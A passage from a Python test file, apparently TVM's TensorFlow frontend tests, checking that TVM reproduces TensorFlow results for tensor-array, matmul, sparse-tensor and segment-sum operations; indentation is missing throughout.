compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
"""One iteration of ConcatV2"""
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
"""One iteration of sigmoid"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
"""Sigmoid"""
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
"""One iteration of a variable"""
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
"""Read Variable op test"""
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
"""One iteration of matmul"""
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, convert_config={"use_dense": True}
)
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, convert_config={"use_dense": False}
)
def test_forward_matmul():
"""MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
convert_config={"use_nt_batch_matmul": True},
)
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
convert_config={"use_nt_batch_matmul": False},
)
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
# for now, in TOPI, only llvm & cublas's implementation support dynamic shape
# TODO add more backends support in TOPI
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
mode="vm",
targets=["llvm", "cuda -libs=cublas"],
convert_config={"use_nt_batch_matmul": True},
)
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
mode="vm",
targets=["llvm", "cuda -libs=cublas"],
convert_config={"use_nt_batch_matmul": False},
)
def test_forward_batch_matmul():
"""TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
_test_batch_matmul((1, 8, 64, 2), (2, 1), "float32", False, False)
_test_batch_matmul((1, 8, 8, 64), (64, 1), "float32", False, False)
_test_batch_matmul((1, 8, 64), (64, 1), "float32", False, False)
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(6, None),
(2, 3, 4, 5, 6),
(6, 1),
"float32",
)
_test_batch_matmul_dynamic(
(None, 5, 6),
(6, None),
(24, 5, 6),
(6, 1),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
"""One iteration of sparse_dense_matmul"""
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
"""sparse_dense_matmul op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
"""sparse_fill_empty_rows op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
"""sparse_reshape op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
# Output shape depends on a dynamic input, use VM.
if default_value == None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name, mode="vm"
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
mode="vm",
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
# The output shape depends on a dynamic input, use VM.
compare_tf_with_tvm([], [], result.name, mode="vm")
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
"""One iteration of tf.sparse.add"""
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
